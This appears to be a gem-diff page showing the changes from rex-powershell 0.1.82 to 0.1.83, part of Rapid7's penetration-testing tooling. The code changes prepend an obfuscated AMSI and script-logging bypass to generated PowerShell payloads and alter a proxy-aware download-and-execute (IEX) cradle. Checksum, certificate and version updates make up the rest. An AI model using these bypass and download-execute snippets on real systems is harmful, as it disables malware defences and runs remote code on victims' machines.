rex-powershell 0.1.82 → 0.1.83
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +5 -5
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/lib/rex/powershell/command.rb +7 -3
- data/lib/rex/powershell/psh_methods.rb +17 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +79 -74
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
|
-
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: 421ac28e512865c91044739b0da3ab0760e80c4f4df966cbf39a935c1d083f3c
|
4
|
+
data.tar.gz: d5e958eaa5539f183d67543b3feaa4b9f489f2868882032cb43d6d9f30f82668
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: a545a48c3e0515cd897155304736db6749877453abc5fc07e9c3e7cc84ef6417e5bda0a2523ec0e43dc9ff93dc40fecb31f004f5a84bfca75e6cb7b34f8f5946
|
7
|
+
data.tar.gz: 4c1ae7b605031e7cbe433b62a1a916d5bdef4322910035929baa3982de6a247a1133e11a747cf06dd35f110ed752fa62150199885afa1318c59efc30c2c5cfea
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
@@ -316,11 +316,13 @@ EOS
|
|
316
316
|
end
|
317
317
|
end
|
318
318
|
|
319
|
+
compressed_payload = compress_script(psh_payload, nil, opts)
|
320
|
+
|
319
321
|
if opts[:prepend_protections_bypass]
|
320
|
-
|
322
|
+
bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
|
323
|
+
compressed_payload = bypass_amsi + ";" + compressed_payload
|
321
324
|
end
|
322
325
|
|
323
|
-
compressed_payload = compress_script(psh_payload, nil, opts)
|
324
326
|
encoded_payload = encode_script(psh_payload, opts)
|
325
327
|
|
326
328
|
# This branch is probably never taken...
|
@@ -372,7 +374,9 @@ EOS
|
|
372
374
|
end
|
373
375
|
psh_command = generate_psh_command_line(command_args)
|
374
376
|
|
375
|
-
if opts[:
|
377
|
+
if opts[:exec_in_place] and (not opts[:encode_final_payload] and not opts[:encode_inner_payload])
|
378
|
+
command = final_payload
|
379
|
+
elsif opts[:remove_comspec]
|
376
380
|
command = psh_command
|
377
381
|
else
|
378
382
|
command = "%COMSPEC% /b /c start /b /min #{psh_command}"
|
@@ -124,12 +124,12 @@ module Powershell
|
|
124
124
|
#
|
125
125
|
# @return [String] PowerShell code to disable PowerShell Built-In Protections
|
126
126
|
def self.bypass_powershell_protections()
|
127
|
-
%Q{
|
127
|
+
uglify_ps(%Q{
|
128
128
|
If($PSVersionTable.PSVersion.Major -ge 3){
|
129
129
|
#{self.bypass_script_log}
|
130
130
|
#{self.bypass_amsi}
|
131
131
|
}
|
132
|
-
}
|
132
|
+
})
|
133
133
|
end
|
134
134
|
|
135
135
|
#
|
@@ -147,6 +147,14 @@ module Powershell
|
|
147
147
|
end
|
148
148
|
end
|
149
149
|
|
150
|
+
#
|
151
|
+
# Force use of TLS1.2
|
152
|
+
#
|
153
|
+
# @ return [String] Powershell code to force use of TLS1.2
|
154
|
+
def self.force_tls12()
|
155
|
+
%Q^[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;^
|
156
|
+
end
|
157
|
+
|
150
158
|
#
|
151
159
|
# Use the default system web proxy and credentials to download a URL
|
152
160
|
# as a string and execute the contents as PowerShell
|
@@ -158,15 +166,21 @@ module Powershell
|
|
158
166
|
def self.proxy_aware_download_and_exec_string(url, iex = true)
|
159
167
|
var = Rex::Text.rand_text_alpha(1)
|
160
168
|
cmd = "$#{var}=new-object net.webclient;"
|
169
|
+
cmd << "if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){"
|
161
170
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
162
171
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
172
|
+
cmd << "};"
|
163
173
|
if iex
|
164
|
-
cmd << "IEX $#{var}.
|
174
|
+
cmd << "IEX ([System.Text.Encoding]::ASCII.GetString($#{var}.downloaddata('#{url}')));"
|
165
175
|
else
|
166
176
|
cmd << "&([scriptblock]::create($#{var}.downloadstring('#{url}'));"
|
167
177
|
end
|
168
178
|
cmd
|
169
179
|
end
|
180
|
+
|
181
|
+
def self.uglify_ps(script)
|
182
|
+
return script.gsub(/\ +/, " ").gsub(/\n+/, '')
|
183
|
+
end
|
170
184
|
end
|
171
185
|
end
|
172
186
|
end
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.83
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- David 'thelightcosine' Maloney
|
@@ -10,85 +10,90 @@ bindir: exe
|
|
10
10
|
cert_chain:
|
11
11
|
- |
|
12
12
|
-----BEGIN CERTIFICATE-----
|
13
|
-
|
14
|
-
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
19
|
-
|
20
|
-
|
21
|
-
|
22
|
-
|
23
|
-
|
24
|
-
|
25
|
-
|
26
|
-
|
27
|
-
|
28
|
-
|
29
|
-
|
30
|
-
|
31
|
-
|
13
|
+
MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl
|
14
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
15
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
16
|
+
b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG
|
17
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
18
|
+
cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi
|
19
|
+
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c
|
20
|
+
JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP
|
21
|
+
mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+
|
22
|
+
wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4
|
23
|
+
VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/
|
24
|
+
AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB
|
25
|
+
AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
|
26
|
+
BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun
|
27
|
+
pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC
|
28
|
+
dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf
|
29
|
+
fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm
|
30
|
+
NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx
|
31
|
+
H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe
|
32
|
+
+o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g==
|
32
33
|
-----END CERTIFICATE-----
|
33
34
|
- |
|
34
35
|
-----BEGIN CERTIFICATE-----
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
42
|
-
|
43
|
-
|
44
|
-
|
45
|
-
|
46
|
-
|
47
|
-
|
48
|
-
|
49
|
-
|
50
|
-
|
51
|
-
|
52
|
-
|
53
|
-
|
54
|
-
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
36
|
+
MIIFMDCCBBigAwIBAgIQBAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBl
|
37
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
38
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
39
|
+
b3QgQ0EwHhcNMTMxMDIyMTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQG
|
40
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
41
|
+
cnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBT
|
42
|
+
aWduaW5nIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8O
|
43
|
+
Ea9ndwfTCzFJGc/Q+0WZsTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq
|
44
|
+
8JyGpdglrA55KDp+6dFn08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRp
|
45
|
+
wsJS8hRniolF1C2ho+mILCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/p
|
46
|
+
fMuSoeU7MRzP6vIK5Fe7SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3
|
47
|
+
jNEgJSPrCGQ+UpbB8g8S9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczye
|
48
|
+
n6Yzqf0Z3yWT0QIDAQABo4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNV
|
49
|
+
HQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBr
|
50
|
+
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUH
|
51
|
+
MAKGN2h0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJ
|
52
|
+
RFJvb3RDQS5jcnQwgYEGA1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2lj
|
53
|
+
ZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6
|
54
|
+
Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmww
|
55
|
+
TwYDVR0gBEgwRjA4BgpghkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
56
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsq
|
57
|
+
CqOl6nEDwGD5LfZldQ5YMB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgP
|
58
|
+
MA0GCSqGSIb3DQEBCwUAA4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHX
|
59
|
+
fgtg/cM9D8Svi/3vKt8gVTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddf
|
60
|
+
RHnzNhQGivecRk5c/5CxGwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8Al
|
61
|
+
EeKcFEehemhor5unXCBc2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+
|
62
|
+
L3J+HNdJRZboWR3p+nRka7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8
|
63
|
+
B4H6i9r5gkn3Ym6hU/oSlBiFLpKR6mhsRDKyZqHnGKSaZFHv
|
60
64
|
-----END CERTIFICATE-----
|
61
65
|
- |
|
62
66
|
-----BEGIN CERTIFICATE-----
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
81
|
-
|
82
|
-
|
83
|
-
|
84
|
-
|
85
|
-
|
86
|
-
|
87
|
-
|
88
|
-
|
89
|
-
|
67
|
+
MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
|
68
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
69
|
+
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
|
71
|
+
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
72
|
+
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
|
74
|
+
Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
|
75
|
+
1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
|
76
|
+
so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
|
77
|
+
3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
|
78
|
+
rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
|
79
|
+
M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
80
|
+
dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
|
81
|
+
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
82
|
+
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
83
|
+
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
84
|
+
MEwGA1UdIARFMEMwNwYJYIZIAYb9bAMBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
85
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQQBMIGEBggrBgEFBQcBAQR4MHYw
|
86
|
+
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
87
|
+
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
88
|
+
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
89
|
+
BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
|
90
|
+
bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
|
91
|
+
sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
|
92
|
+
cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
|
93
|
+
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
94
|
+
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
90
95
|
-----END CERTIFICATE-----
|
91
|
-
date: 2019-
|
96
|
+
date: 2019-11-18 00:00:00.000000000 Z
|
92
97
|
dependencies:
|
93
98
|
- !ruby/object:Gem::Dependency
|
94
99
|
name: bundler
|
@@ -212,7 +217,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
212
217
|
version: '0'
|
213
218
|
requirements: []
|
214
219
|
rubyforge_project:
|
215
|
-
rubygems_version: 2.
|
220
|
+
rubygems_version: 2.7.10
|
216
221
|
signing_key:
|
217
222
|
specification_version: 4
|
218
223
|
summary: Rex Powershell Utilities
|
metadata.gz.sig
CHANGED
Binary file
|